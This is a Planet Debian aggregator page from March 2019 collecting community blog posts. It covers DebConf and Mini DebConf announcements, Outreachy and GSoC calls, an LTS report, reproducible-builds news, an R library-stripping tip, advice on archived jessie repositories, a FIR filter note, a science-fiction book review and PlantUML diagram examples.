We tried to cut the longer version below a bit shorter and rely more on the wiki. If some information is missing, please reply to this email and we'll fix it.

Registration

Please register now, registration is free and open now until May 23rd.

In order to register, add your name and details to the registration page in the Debian wiki.

There's space for approximately 150 people due to limited space in the main auditorium.

Please register ASAP, as we need this information for planning food and hacking space size calculations.

Talks wanted (CfP)

We have assembled a content team (consisting of Michael Banck and Lee Garrett), who soon will publish an extra post for the CfP. Though you don't need to wait for that and can already send your proposals to

    cfp@minidebconfhamburg.debian.net

We will have talks on Saturday and Sunday, the exact slots are yet to be determined by the content team.

We expect submissions and talks to be held in English, as this is the working language in Debian and at this event.

Debian Sprints

The miniDebcamp from Wednesday to Friday is a perfect opportunity to host Debian sprints. We would welcome if teams assemble and work together on their projects.

Sponsors wanted

Making a Mini DebConf happen costs money, we need to rent the venue, video gear, hopefully can pay hard working volunteers lunch and dinner, probably sponsor some travel costs and last not least print T-Shirts.

We very much appreciate companies willing to support Debian through this meeting!

We have three sponsor categories:

  • 1000€ = sponsor, listed as such in all material and on the t-shirts.

  • 2500€ = gold sponsor, listed as such in all material & shirts, logo featured in the videos.

  • 5000€ = platinum sponsor, listed as such prominently in all material & shirts, logo featured prominently in the videos

Plus, there's corporate registration as an option too, where we will charge you 250€ for the registration. Please contact us if you are interested in that!

Location

The event will be hosted in the Victoria Kaserne (also called Fux or Frappant), which is a collective art space located in a historical monument. It is located between S-Altona and S-Holstenstraße, so there is a direct subway connection to/from the Hamburg Airport (HAM) and Altona is also a long distance train station.

There's a Gigabit-Fiber uplink connection and wireless coverage basically everywhere in the venue and in the outside areas.

More information about the venue is provided in the wiki.

Accommodation

The Mini-DebConf will take place in the center of Hamburg, so there are many accomodation options available. Some suggestions for housing options are given in the wiki and you might want to share your findings there too.

There is also limited on-site accomodation available, please send a mail to holger@d.o if you'd like to stay on site

More volunteers wanted

Some things still need more helping hands:

We need some volunteers for frontdesk duties, which mostly means being at the venue in the morning before things start (though if possible frontdesk should be operated throughout the day)and help people find their way.

We also need more video volunteers. We know the gear will arrive, together with a person knowing how to operate it, but that's it. Please consider making sure we'll have videos released! ;) (And streams hopefully too.)

In general, if you notice something to improve, try to be the change you want to see.

Contact

If you want to help, need help, have comments or want to contact us for other reasons, there are several ways:

  • the irc channel #debconf-hamburg on irc.debian.org
  • the mailing list debian-events-eu@lists.debian.org
  • editing the wiki page which will notify us

Looking forward to see you in Hamburg!


Holger, for the 2019 Mini DebConf Hamburg team

28 March, 2019 11:21AM

hackergotchi for Bits from Debian

Bits from Debian

Debian is welcoming applicants for Outreachy and GSoC 2019

Debian is dedicated to increasing the diversity of contributors to the project and improving the inclusivity of the project. We strongly believe working towards these goals provides benefits both for people from backgrounds that are currently under-represented in free software, and for the wider movement, by increasing the range of skills, experiences and viewpoints contributing to it.

As part of this outreach effort, Debian is participating in the next round of Outreachy.

The application period for the May 2019 to August 2019 round has been extended until April 2, and Debian offers the following projects:

Outreachy invites applicants who are women (both cis and trans), trans men, and genderqueer people to apply. Anyone who faces systemic bias or discrimination in the technology industry of their country is also invited to apply.

Don't wait up! You can learn more details on how to submit your application or get help in our wiki page for Outreachy and the Outreachy website.

Debian is also participating in the Google Summer of Code (GSoC) with eight projects, and the student application period is open until April 9.

You can learn more details on how to submit your GSoC application or get help for in our wiki page for GSoC and the Google Summer of Code website.

We encourage people who are elegible for Outreachy and GSoC to submit their application to both programs.

28 March, 2019 11:15AM by Laura Arjona Reina and Lesley Mitchell

Russ Allbery

Review: Caliban's War

Review: Caliban's War, by James S.A. Corey

Series: The Expanse #2
Publisher: Orbit
Copyright: June 2012
ISBN: 0-316-20227-4
Format: Kindle
Pages: 594

Caliban's War is the sequel to Leviathan Wakes and the second book in the Expanse series. This is the sort of series that has an over-arching, long-term plot line with major developments in each book, so it's unfortunately easy to be spoiled by reading anything about later volumes of the series. (I'm usually reasonably good at avoiding spoilers, but still know a bit more than I want about subsequent developments.) I'm going to try to keep this review relatively free of spoilers, but even discussion of characters gives a few things away. If you want to stay entirely unspoiled, you may not want to read this.

Also, as that probably makes obvious, there's little point in reading this series out of order, although the authors do a reasonably good job filling in the events of the previous book. (James S.A. Corey is a pseudonym for the writing team of Daniel Abraham and Ty Franck.) I still resorted to reading the Wikipedia plot summary, though, since it had been years since I read the first book.

Caliban's War opens on Ganymede, a year and a half after the events of Leviathan Wakes. Thanks to its magnetosphere, Ganymede enjoys rare protection from Jupiter's radiation field. Thanks to meticulously-engineered solar arrays, it is the bread basket of the outer solar system. That's before an inhuman creature attacks a unit of Earth and then Martian soldiers, killing all but one of them and sparking an orbital battle between Mars and Earth that destroys much of Ganymede's fragile human ecosystem. Ganymede's collapse is the first problem: a humanitarian catastrophe. The second problem is the attacking creature, which may be a new destabilizing weapon and may be some new twist on the threat of Leviathan Wakes. And the third problem is Venus, where incomprehensible things are happening that casually violate the known laws of physics.

James Holden returns to play a similar role as he did in Leviathan Wakes: the excessively idealistic pain in the ass who tends to blow open everyone's carefully-managed political machinations. Unfortunately, I think this worked much less well in this book. Holden has a crisis of conscience and spends rather a lot of the book being whiny and angstful, which I found more irritating than entertaining. I think it was an attempt at showing some deeper nuance in his relationships with his crew, but it didn't work for me.

The new character around whom the plot revolves is Prax, a botanist whose daughter is mysteriously kidnapped in the prelude of the book. (Apparently it can't be an Expanse novel without a kidnapped girl or woman.) He's unfortunately more of a plot device than a person for most of the story. One complaint I have about this about this book is that the opening chapters on Ganymede drag on for much longer than I'd prefer, while running Prax through the wringer and not revealing much about the plot. This is another nearly 600 page book; I think it would have been a tighter, sharper book if it were shorter.

That said, the other two new viewpoint characters, Bobbie and Avasarala, make up for a lot.

Avasarala is an apparently undistinguished member of the UN Earth government who has rather more power than her position indicates because she's extremely good at political maneuvering. I loved her within twenty pages of when she was introduced, and kept being delighted by her for the whole book. One of my favorite tropes in fiction is watching highly competent people be highly competent, and it's even better when they have engagingly blunt personalities. Avasarala is by turns grandmotherly and ruthless, polite and foul-mouthed, and grumpy and kind. Even on her own, she's great; when she crosses paths with Bobbie, the one surviving Martian marine from the initial attack who gets tangled in the resulting politics, something wonderful happens. Bobbie's principled and straightforward honesty is the perfect foil for Avasarala's strategic politics. Those sections are by far the best part of this book.

I think this is a somewhat weaker book than Leviathan Wakes. It starts slow and bogs down a bit in the middle with Holden's angst and relationship problems. But Avasarala is wonderful and makes everything better and gets plenty of viewpoint chapters, as does Bobbie who becomes both a lens through which to see more of Avasarala and a believable and sympathetic character in her own right. The main plot of the series does move forward somewhat, but this feels like mostly side story and stage setting. If you enjoyed Leviathan Wakes, though, I think you'll enjoy this, for Avasarala and Bobbie if nothing else.

Caliban's War satisfactorily closes out its own plot arc, but it introduces a substantial cliff-hanger in the last pages as setup for the next book in the series.

Followed by Abaddon's Gate in the novel sense. There is a novella, Gods of Risk, set between this book and Abaddon's Gate, but it's optional reading.

Rating: 7 out of 10

28 March, 2019 03:44AM

hackergotchi for Dirk Eddelbuettel

Dirk Eddelbuettel

#21: A Third and Final (?) Post on Stripping R Libraries

Welcome to the 21th post in the reasonably relevant R ramblings series, or R4 for short.

Back in August of 2017, we wrote two posts #9: Compating your Share Libraries and #10: Compacting your Shared Libraries, After The Build about “stripping” shared libraries. This involves removing auxiliary information (such as debug symbols and more) from the shared libraries which can greatly reduce the installed size (on suitable platforms – it mostly matters where I work, i.e. on Linux). As an illustration we included this chart:

Chart from August 2017 postChart from August 2017 post

Two items this week made me think of these posts. First was that a few days ago I noticed the following src/Makefile of the precrec package I was starting to use more:

# copied from https://github.com/vinecopulib/rvinecopulib
# strip debug symbols for smaller Linux binaries
strippedLib: $(SHLIB)
    if test -e "/usr/bin/strip" & test -e "/bin/uname" & [[ `uname` == "Linux" ]] ; \
        then /usr/bin/strip --strip-debug $(SHLIB); fi
.phony: strippedLib

And lo and behold, the quoted package rvinecopulib

has the same

CXX_STD      = CXX11
PKG_CPPFLAGS = -I../inst/include -pthread

# strip debug symbols for smaller Linux binaries
strippedLib: $(SHLIB)
    if test -e "/usr/bin/strip" & test -e "/bin/uname" & [[ `uname` == "Linux" ]] ; \
        then /usr/bin/strip --strip-debug $(SHLIB); fi
.phony: strippedLib

I was intrigued and googled a little. To my surprise I found one related reference … in a stone-old src/Makevars of mine in RcppClassic and probably written in 2007 or 2008. But more astonishing, the actual reference to the “phony target” trick is in … the #9 post from August 2017 referenced above. Doh. Younger me knew this, current me did not, and as those two packages didn’t reference my earlier use I had to re-find it. Oh well.

But the topic is still a very important one. The two blog posts show how to deal with this locally as a user and “consumer” of packages (as well as via the “phony trick” as a producer of packages) as well as an admin of a system with such packages. Personally I had been using this trick since August 2017 via my ~/.R/Makevars.

And we were still missing such a tool for the more general deployment. Well, until today, or rather, until R 3.6.0 comes out offically on April 26. The (excellent) R-devel Daily ‘NEWS’ feed – which itself was the topic of post #3: Follow R-devel – will likely show tomorrow something about this commit I spotted by following Winston’s mirror of the R-devel sources:

Part of ‘strip on install’ commitPart of ‘strip on install’ commit

And indeed, we now can now do this with R-devel (rebuilt from today’s sources):

As a quick check, installing the (small, C-only) digest package without / with the --strip options gets us, respectively, 425kb and 123kb. So the ratios from the chart above should now be achievable directly from R CMD INSTALL --strip with R 3.6.0. (And for what it is worth, it still works with the older tricks mentioned above.)

And as occupying disk space with unused debugging symbols is wasteful, the new extension to R CMD INSTALL is most welcome.

Last but not least: It is this type of relentless small improvements to R, its innards, its installations and support by R Core that make this system for Programming with Data such an excellent tool and joy to use and follow. A big Thank You! to R Core for all they do, and do quietly yet relentlessly. It is immensely appreciated.

28 March, 2019 02:31AM

March 27, 2019

hackergotchi for Lucas Nussbaum

Lucas Nussbaum

Removal of jessie-updates and jessie-backports from Debian mirrors

If you are still running jessie you probably noticed that the jessie-updates and jessie-backports suites have been removed from mirrors, because you got those error messages:

W: Failed to fetch http://ftp.debian.org/debian/dists/jessie-updates/main/binary-amd64/Packages 404 Not Found [IP: 130.89.148.12 80]
W: Failed to fetch http://ftp.debian.org/debian/dists/jessie-backports/main/binary-amd64/Packages 404 Not Found [IP: 130.89.148.12 80]

I was not involved in that decision (which was made by the FTP masters team), but since there is some confusion around it, I will try to give my understanding of the resulting issues.

The typical /etc/apt/sources.list file for a jessie system with backports enabled is:

deb http://ftp.debian.org/debian jessie main
deb-src http://ftp.debian.org/debian jessie main

deb http://security.debian.org/debian-security jessie/updates main
deb-src http://security.debian.org/debian-security jessie/updates main

deb http://ftp.debian.org/debian jessie-updates main
deb-src http://ftp.debian.org/debian jessie-updates main

deb http://ftp.debian.org/debian/ jessie-backports main contrib non-free
deb-src http://ftp.debian.org/debian/ jessie-backports main contrib non-free

Debian packages are distributed using suites (which can be understood as channels). The global picture looks like this:

(This is slide 42 of the Debian Packaging Tutorial.)

deb http://deb.debian.org/debian jessie main is the easy one. It contains the bulk of packages. It is initialized by copying the content of the testing suite when a new stable release happens, approximately every two years. It is then updated from stable-new (an internal suite) when stable point releases happen (see below).

deb http://security.debian.org/debian-security jessie/updates main is the security suite in the figure above. It is used by the Debian security team to provide security updates. They are announced on the debian-security-announce mailing list.

deb http://ftp.debian.org/debian jessie-updates main (stable-updates above) is a suite used to distribute important updates that are unrelated to security, and that cannot wait the next stable point release. They are announced on the debian-stable-announce mailing list. Interestingly, a large proportion of those updates are related to changes to daylight-saving-time rules that are sometimes made very late by some countries.

stable point releases happen every few months (see for example the Debian 8.11 stable point release). They consist in updating the stable suite by copying important updates that were submitted to stable-proposed-updates. Security updates are also included.

backports follow an entirely different path. They are new versions of packages, based on the version currently in the testing suite. See the backports team website.

So, what happened?

In June 2018…

Debian 8.11 (in June 2018) was the final update for Debian 8. As stated in its announcement:

After this point release, Debian's Security and Release Teams will no
longer be producing updates for Debian 8. Users wishing to continue to
receive security support should upgrade to Debian 9, or see
https://wiki.debian.org/LTS for details about the subset of
architectures and packages covered by the Long Term Support project.

In other words: jessie and jessie-updates won’t receive any update. The only updates will be through the security suite, by the Debian Long Term Support project.

At about the same time (I think – I could not find an announcement — Update: announcement), the maintenance of backports for jessie was also stopped. Which makes sense, because the backports team provides backports for the current release, and stretch was released in June 2017.

In March 2019…

The FTP masters team decided to remove the jessie-updates and jessie-backports suite from the mirrors. This was announced on debian-devel-announce, resulting in the errors quoted above.

How to solve this?

For the jessie-updates suite, you can simply remove it from your /etc/apt/sources.list. It is useless, because all packages that were in jessie-updates were merged into jessie when Debian 8.11 was released.

The jessie-backports suite was archived on archive.debian.org, so you can use:

deb http://archive.debian.org/debian/ jessie-backports main contrib non-free
deb-src http://archive.debian.org/debian/ jessie-backports main contrib non-free

But then you will run into another issue:

E: Release file for http://archive.debian.org/debian/dists/jessie-backports/InRelease is expired (invalid since 36d 1h 9min 51s). Updates for this repository will not be applied.

Unfortunately, with the APT version in jessie, this cannot be ignored on a per source basis (it can with the APT version from stretch, using the deb [check-valid-until=no] ... syntax). So you need to disable this check globally, using:

echo 'Acquire::Check-Valid-Until no;' > /etc/apt/apt.conf.d/99no-check-valid-until

After that, apt-get update just works.

(There are some discussions about resurrecting the jessie-updates suite to avoid the above errors, but it is probably getting less and less useful as time passes.)

27 March, 2019 09:46PM by lucas

Reproducible builds folks

Reproducible Builds: Weekly report #204

Here’s what happened in the Reproducible Builds effort between Sunday March 17 and Saturday March 23 2019:

Don’t forget that Reproducible Builds is part of May/August 2019 round of Outreachy which offers paid internships to work on free software. Internships are open to applicants around the world and are paid a stipend for the three month internship with an additional travel stipend to attend conferences. So far, we received more than ten initial requests from candidates and the closing date for applicants is April 2nd. More information is available on the application page.

diffoscope development

diffoscope is our in-depth “diff-on-steroids” utility which helps us diagnose reproducibility issues in packages. This week:

  • Chris Lamb:
    • Always warn if the tlsh module is not available (not just if a specific fuzziness threshold is specified) to match the epilog of the --help output. This prevents missing support for file rename detection. (#29)
    • Fix a number of tests when using GhostScript 9.20 vs 9.26 for Debian stable vs. the same distribution with the security/point release applied. []
  • Mattia Rizzolo:
    • Ignore the version mismatch detection when building backport. []
    • Make test_ps.test_text_diff pass with ghostscript 9.26. []
  • Milena Boselli Rosa:
    • Remove the type HTML attribute from style elements. []
    • Prevent empty values for the name attribute name on HTML anchor tags and add an id to its parent div container. []
    • Fix a Text run is not in Unicode Normalization Form C HTML validation warning. []
    • Fix a Table column x established by element ‘col’ has no cells beginning in it HTML validation error. []

Packages reviewed and fixed, and bugs filed

Test framework development

We operate a comprehensive Jenkins-based testing framework that powers tests.reproducible-builds.org. This week, Mattia Rizzolo:

  • Fixed the dsa-check-running-kernel script after Ubuntu updated their packages. []
  • Do not blindly forward the jenkins@ emails, otherwise procmail cannot filter them (breaking our email2irc script). []
  • Gave Vagrant Cascadian root everywhere. []

This week’s edition was written by Bernhard M. Wiedemann, Chris Lamb, Holger Levsen, Mattia Rizzolo and Vagrant Cascadian & was reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

27 March, 2019 02:01PM

hackergotchi for Joachim Breitner

Joachim Breitner

How to merge a Pull Request

It’s easy!

How to merge a pull request

How to merge a pull request

27 March, 2019 10:46AM by Joachim Breitner (mail@joachim-breitner.de)

March 26, 2019

hackergotchi for Bits from Debian

Bits from Debian

Call for Proposals: Debconf 19, Curitiba, Brazil

The DebConf Content team would like to call for proposals in the DebConf 19 conference, which will take place in Curitiba, Brazil, between July 21th and 28th. It will be preceded by DebCamp from July 14th to 19th, and Open Day on the 20th.

You can find this Call for Proposals, in its latest form, online:

https://debconf19.debconf.org/cfp/

Please refer to this URL for updates on the present information.

Submitting an Event

You can now submit an event proposal. Events are not limited to traditional presentations or informal sessions (BoFs): we welcome submissions of tutorials, performances, art installations, debates, or any other format of event that you think would be of interest to the Debian community.

Regular sessions may either be 20 or 45 minutes long (including time for questions), other kinds of sessions (workshops, demos, lightning talks, ...) could have different durations. Please choose the most suitable duration for your event and explain any special requests.

You will need to create an account on the site, to submit a talk. We suggest that Debian account holders (including DDs and DMs) to use Debian SSO when creating an account. However, this isn't required, as you can sign up with an e-mail address and password.

Timeline

If you depend on having your proposal accepted in order to attend the conference, please submit it in a timely fashion so that it can be considered (and potentially accepted) as soon as possible.

All proposals must be submitted before Sunday April 28th, 2019 to be evaluated for the official schedule.

Topics and Tracks

Though we invite proposals on any Debian or FLOSS related subject, we have some broad topics on which we encourage people to submit proposals, including but not limited to:

  • Cloud and containers
  • Debian Blends
  • Debian in Science
  • Embedded
  • Introduction to Free Software & Debian
  • Packaging, policy, and Debian infrastructure
  • Security
  • Social context
  • Systems administration, automation and orchestration

You are welcome to either suggest more tracks, or to become a coordinator for any of them. For more information, see the Content team wiki.

Open Day

This call for proposals also targets Open Day, a day of activities targeted at the general public on July 20th. Topics of interest range from topics specific to Debian to the greater Free Software community and maker movement. The idea of Open Day is to bring the general public closer to Debian and vice-versa, so activity proposals that go in that direction are more than welcome.

If you are interested in presenting on Open Day, let us know in the "Notes" field of your submission. We might also invite proponents that are not specifically targeting Open Day to present in it if we find that the topic fits the above goals.

The Open Day will host activities in multiple languages. We expect to have activities in English, Portuguese, and Spanish.

If your talk will be in portuguese, you can write the Abstract field in portuguese too.

Talk proposal help on IRC

This year we will be holding holding office hours on IRC. Those will be designated times where the DebConf content team will be available to help potential speakers prepare their talk proposals for DebConf.

Dates and times for those will be announced later.

Code of Conduct

Our event is covered by a Code of Conduct designed to ensure everyone’s safety and comfort. The code applies to all attendees, including speakers and the content of their presentations. Do not hesitate to contact us at content@debconf.org if you have any questions or are unsure about certain content you’d like to present.

Video Coverage

Providing video is one of the conference goals, as it makes the content accessible to a wider audience. Unless speakers opt-out, scheduled talks may be streamed live over the Internet to promote remote participation, and recordings will be published later under the DebConf license (MIT/Expat), as well as presentation slides and papers whenever available.

Closing note

DebConf 19 is still accepting sponsors; if you are interested, or think you know of others who would be willing to help, please get in touch with sponsors@debconf.org.

In case of any questions, or if you wanted to bounce some ideas off us first, please do not hesitate to reach out to the content team at content@debconf.org.

We hope to see you in Curitiba!

The DebConf team

26 March, 2019 06:00PM by Gunnar Wolf, Nicolas Braud-Santoniz, Paulo Santana and Antonio Terceiro

hackergotchi for Rapha&#235;l Hertzog

Raphaël Hertzog

Freexian’s report about Debian Long Term Support, February 2019

A Debian LTS logoLike each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In February, about 204.5 work hours have been dispatched among 13 paid contributors. Their reports are available:

  • Abhijith PA did 14 hours (out of 14 hours allocated).
  • Adrian Bunk did 8 hours (out of 8 hours allocated).
  • Antoine Beaupré did 16 hours (out of 19.5 hours allocated + 11.5 extra hours, but gave back the remaining hours because he wanted to stop working on LTS).
  • Ben Hutchings did 4 hours (out of 19.5 hours allocated plus 1 extra hour, thus keeping 16.5 extra hours for March).
  • Brian May did 10 hours (out of 10 hours allocated).
  • Chris Lamb did 18 hours (out of 18 hours allocated).
  • Emilio Pozuelo Monfort did 20.5 hours (out of 19.5 hours allocated + 3.25 extra hours, thus keeping 2.25 hours for March).
  • Hugo Lefeuvre did 19.5 hours (out of 19.5 hours allocated).
  • Markus Koschany did 19.5 hours (out of 19.5 hours allocated).
  • Mike Gabriel did 6 hours (out of 10 hours allocated, thus keeping 4 extra hours for March).
  • Ola Lundqvist did 14 hours (out of 8 hours allocated + 8 extra hours, thus keeping 2 extra hours for March).
  • Roberto C. Sanchez did 13.25 hours (out of 19.5 hours allocated + 9.75 extra hours, thus keeping 16 extra hours for March).
  • Thorsten Alteholz did 19.5 hours (out of 19.5 hours allocated).

Evolution of the situation

The number of sponsors (and thus the funding level) did not change for a couple of months. On the contributors side, we have some turn-over: Antoine Beaupré is stopping after many years of good work. Many thanks to him! Fortunately, Sylvain Beucler just started and the workload did not increase too much on existing contributors. But we are still looking for more paid LTS contributors.

The security tracker currently lists 42 packages with a known CVE and the dla-needed.txt file has 28 packages needing an update.

Thanks to our sponsors

New sponsors are in bold (none this month).

No comment | Liked this article? Click here. | My blog is Flattr-enabled.

26 March, 2019 12:59PM by Raphaël Hertzog

hackergotchi for Steinar H. Gunderson

Steinar H. Gunderson

Optimal stable filtering

This was originally an email to Casey Muratori's blog post about stable filtering; in it, he left a few open questions. Like me, he doesn't allow comments on his blog, so I sent this by email, but evidently, it didn't make it, because now part 2 is out and still doesn't show how to actually find such filters.

Thus, here are the relevant excerpts:

[...] generally, FIR filter response is calculated by means of the Z-transform, giving a complex response of

   Y[w] / X[w] = (... + b2 e^2jw + b1 e^jw + b0)
   F[w]        = sum(k=0..5, e^(jkw) * b_k)

where the normalized frequency w goes from 0..2pi (the interesting part is from 0..pi, the rest is just aliasing), and j = sqrt(-1) so that e^jx = cos(x) + j sin(x).

Your “stability” criterion here seems to be that |F[w]| <= 1, ie., no frequency is ever boosted.

As you've no doubt discovered, the coefficients b_i need to be symmetric (b_0 = b_5, b_1 = b_4, b_2 = b_3); there's a theorem (whose name I've forgotten) that says that this is a necessary and sufficient condition for linear phase (ie., all frequencies are delayed by the same amount). This makes for a great simplification, as we can look at the real part only (the imaginary part will just be the same as the real part multiplied by a constant factor):

   |F[w]| = sum(k=0..5, cos(kw) * b_k) / cos(2.5 w)

So we want F[w] to be as close as possible to 1, without ever exceeding it. I'm sure someone will have a fancy way of optimizing it symbolically, but I chose to just sample w a bunch of times from 0..pi and formulate it as a linear program. Ie., every F[w] <= 1, the objective is sum(F[w]) over all sampled w. (I wonder if I should theoretically do abs() somewhere, but it seems not to be needed.)

This returned the coefficients

  [0.052519, -0.152582, 0.600063, 0.600063, -0.152582, 0.052519]

which I'm fairly certain are at least accurate to three decimal points; more samples may help with the lower decimals.

The six coeficients sum to almost exactly 1.0, which makes sense; more than that, and very low frequencies would pass the 1.0 limit. I have no idea why the middle coefficient is so close to decimal 0.6, though; there may be some deep reason, but I haven't seen it.

You can see frequency plots by Octave comparing your filter [first] and mine [second]:


You can see that mine is a bit better in the upper filters, trading off a little bit of ripple. I would assume they're fairly close in practice.

Some more discussion hidden deep into ryg's tweets.

26 March, 2019 08:22AM

hackergotchi for Jonathan Carter

Jonathan Carter

DPL 2019 Election: Rebuttals

Writing rebuttals is not easy. You have to scrutinise the ideas of the people you admire and highlight the flaws in the ideas that they have put a lot of thought in to. At first I wanted to hold back a bit, because I don’t like being mean, but I think it may be a healthy part of the process to offer a critique towards the fellow candidates. I hope that the other candidates will understand that and not take it personally, my feelings towards them have not changed during this process.

Here are the links:

Links to other updated platforms with rebuttals can be found here: https://www.debian.org/vote/2019/vote_001

26 March, 2019 04:51AM by jonathan

hackergotchi for Gunnar Wolf

Gunnar Wolf

Many random blurbs on Debian

I have been busy as hell this year. I might have grabbed a bigger bite than what I can swallow – In many fronts! Anyway, sitting at an airport, at least I have time to spew some random blurbs to The Planet and beyond!

Voting
We all feared when no candidates showed up at the first call for DPL. But things sorted out themselves as they tend to (and as we all knew that would happen ;-) ), and we have four top-notch DPL candidates. It's getting tough to sort through their platforms and their answers in the lists; the old-timers among us have the additional advantage of knowing who they are and probably having worked closely with some of them. I am still drafting my Condorcet ballot. It won't be an easy task to completely rank them!
DebConf 20 and world politics
For personal and selfish reasons, I am very, very happy to have a reason to go back to Israel after over two decades. Of course, as everybody would expect, there is a bothering level of noise that's not going to quiet down until probably late August 2020... DebConf has often taken controversial turns. Israel is not the toughest one, even if it seems so to some readers. And... Well, to those that want to complain about it — Please do understand that the DebConf Committee is not a politically-acting body. Two bid submissions were presented fully, and the Israeli one was chosen because its local team is stronger. That is probably the best, most important criteria for this conference to be successful. No, it's not like we are betraying anything — It's just the objective best bidding we got from completely volunteer teams.
DebConf 19
What are you waiting for? Register! Submit a talk! Pack up and get your ticket for Brazil!

I'd better get moving, the plane might be getting some ideas about taking off.

26 March, 2019 04:03AM by gwolf

March 25, 2019

Russ Allbery

Spring haul

I think it's becoming safe to call this spring. For once, it's a rainy, cold spring in Northern California. This is a collection of relatively random things (mostly pre-orders) that I've picked up in the last couple of months.

Elizabeth Bear — Ancestral Night (sff)
Robert Jackson Bennett — City of Stairs (sff)
Curtis C. Chen — Kangaroo Too (sff)
Maddox Hahn — The Love Song of Numo and Hammerfist (sff)
Karoliina Korhonen — Finnish NIghtmares (graphic novel)
Ann Leckie — The Raven Tower (sff)
Jenn Lyons — The Ruin of Kings (sff)
Cal Newport — Digital Minimalism (nonfiction)
Noelle Stevenson — Nimona (graphic novel)
Foxfeather Zenkova, et al. — Dry Season Only (nonfiction)

I already read and reviewed Hahn's book, and have read (but not yet written the review of) The Raven Tower by Leckie.

25 March, 2019 11:51PM

hackergotchi for Bits from Debian

Bits from Debian

Google Platinum Sponsor of DebConf19

Googlelogo

We are very pleased to announce that Google has committed to support DebConf19 as a Platinum sponsor.

"The annual DebConf is an important part of the Debian development ecosystem and Google is delighted to return as a sponsor in support of the work of the global community of volunteers who make Debian and DebConf a reality" said Cat Allman, Program Manager in the Open Source Programs and Making & Science teams at Google.

Google is one of the largest technology companies in the world, providing a wide range of Internet-related services and products as online advertising technologies, search, cloud computing, software, and hardware.

Google has been supporting Debian by sponsoring DebConf since more than ten years, and is also a Debian partner sponsoring parts of Salsa's continuous integration infrastructure within Google Cloud Platform.

With this additional commitment as Platinum Sponsor for DebConf19, Google contributes to make possible our annual conference, and directly supports the progress of Debian and Free Software helping to strengthen the community that continues to collaborate on Debian projects throughout the rest of the year.

Thank you very much Google, for your support of DebConf19!

Become a sponsor too!

DebConf19 is still accepting sponsors. Interested companies and organizations may contact the DebConf team through sponsors@debconf.org, and visit the DebConf19 website at https://debconf19.debconf.org.

25 March, 2019 11:30AM by Laura Arjona Reina

Petter Reinholdtsen

PlantUML for text based UML diagram modelling - nice free software

As part of my involvement with the Nikita Noark 5 core project, I have been proposing improvements to the API specification created by The National Archives of Norway and helped migrating the text from a version control system unfriendly binary format (docx) to Markdown in git. Combined with the migration to a public git repository (on github), this has made it possible for anyone to suggest improvement to the text.

The specification is filled with UML diagrams. I believe the original diagrams were modelled using Sparx Systems Enterprise Architect, and exported as EMF files for import into docx. This approach make it very hard to track changes using a version control system. To improve the situation I have been looking for a good text based UML format with associated command line free software tools on Linux and Windows, to allow anyone to send in corrections to the UML diagrams in the specification. The tool must be text based to work with git, and command line to be able to run it automatically to generate the diagram images. Finally, it must be free software to allow anyone, even those that can not accept a non-free software license, to contribute.

I did not know much about free software UML modelling tools when I started. I have used dia and inkscape for simple modelling in the past, but neither are available on Windows, as far as I could tell. I came across a nice list of text mode uml tools, and tested out a few of the tools listed there. The PlantUML tool seemed most promising. After verifying that the packages is available in Debian and found its Java source under a GPL license on github, I set out to test if it could represent the diagrams we needed, ie the ones currently in the Noark 5 Tjenestegrensesnitt specification. I am happy to report that it could represent them, even thought it have a few warts here and there.

After a few days of modelling I completed the task this weekend. A temporary link to the complete set of diagrams (original and from PlantUML) is available in the github issue discussing the need for a text based UML format, but please note I lack a sensible tool to convert EMF files to PNGs, so the "original" rendering is not as good as the original was in the publised PDF.

Here is an example UML diagram, showing the core classes for keeping metadata about archived documents:

@startuml
skinparam classAttributeIconSize 0

!include media/uml-class-arkivskaper.iuml
!include media/uml-class-arkiv.iuml
!include media/uml-class-klassifikasjonssystem.iuml
!include media/uml-class-klasse.iuml
!include media/uml-class-arkivdel.iuml
!include media/uml-class-mappe.iuml
!include media/uml-class-merknad.iuml
!include media/uml-class-registrering.iuml
!include media/uml-class-basisregistrering.iuml
!include media/uml-class-dokumentbeskrivelse.iuml
!include media/uml-class-dokumentobjekt.iuml
!include media/uml-class-konvertering.iuml
!include media/uml-datatype-elektronisksignatur.iuml

Arkivstruktur.Arkivskaper "+arkivskaper 1..*" <-o "+arkiv 0..*" Arkivstruktur.Arkiv
Arkivstruktur.Arkiv o--> "+underarkiv 0..*" Arkivstruktur.Arkiv
Arkivstruktur.Arkiv "+arkiv 1" o--> "+arkivdel 0..*" Arkivstruktur.Arkivdel
Arkivstruktur.Klassifikasjonssystem "+klassifikasjonssystem [0..1]" <--o "+arkivdel 1..*" Arkivstruktur.Arkivdel
Arkivstruktur.Klassifikasjonssystem "+klassifikasjonssystem [0..1]" o--> "+klasse 0..*" Arkivstruktur.Klasse
Arkivstruktur.Arkivdel "+arkivdel 0..1" o--> "+mappe 0..*" Arkivstruktur.Mappe
Arkivstruktur.Arkivdel "+arkivdel 0..1" o--> "+registrering 0..*" Arkivstruktur.Registrering
Arkivstruktur.Klasse "+klasse 0..1" o--> "+mappe 0..*" Arkivstruktur.Mappe
Arkivstruktur.Klasse "+klasse 0..1" o--> "+registrering 0..*" Arkivstruktur.Registrering
Arkivstruktur.Mappe --> "+undermappe 0..*" Arkivstruktur.Mappe
Arkivstruktur.Mappe "+mappe 0..1" o--> "+registrering 0..*" Arkivstruktur.Registrering
Arkivstruktur.Merknad "+merknad 0..*" <--* Arkivstruktur.Mappe
Arkivstruktur.Merknad "+merknad 0..*" <--* Arkivstruktur.Dokumentbeskrivelse
Arkivstruktur.Basisregistrering -|> Arkivstruktur.Registrering
Arkivstruktur.Merknad "+merknad 0..*" <--* Arkivstruktur.Basisregistrering
Arkivstruktur.Registrering "+registrering 1..*" o--> "+dokumentbeskrivelse 0..*" Arkivstruktur.Dokumentbeskrivelse
Arkivstruktur.Dokumentbeskrivelse "+dokumentbeskrivelse 1" o-> "+dokumentobjekt 0..*" Arkivstruktur.Dokumentobjekt
Arkivstruktur.Dokumentobjekt *-> "+konvertering 0..*" Arkivstruktur.Konvertering
Arkivstruktur.ElektroniskSignatur -[hidden]-> Arkivstruktur.Dokumentobjekt
@enduml

The format is quite compact, with little redundant information. The text expresses entities and relations, and there is little layout related fluff. One can reuse content by using include files, allowing for consistent naming across several diagrams. The include files can be standalone PlantUML too. Here is the content of media/uml-class-arkivskaper.iuml:

@startuml
class Arkivstruktur.Arkivskaper  {
  +arkivskaperID : string
  +arkivskaperNavn : string
  +beskrivelse : string [0..1]
}
@enduml

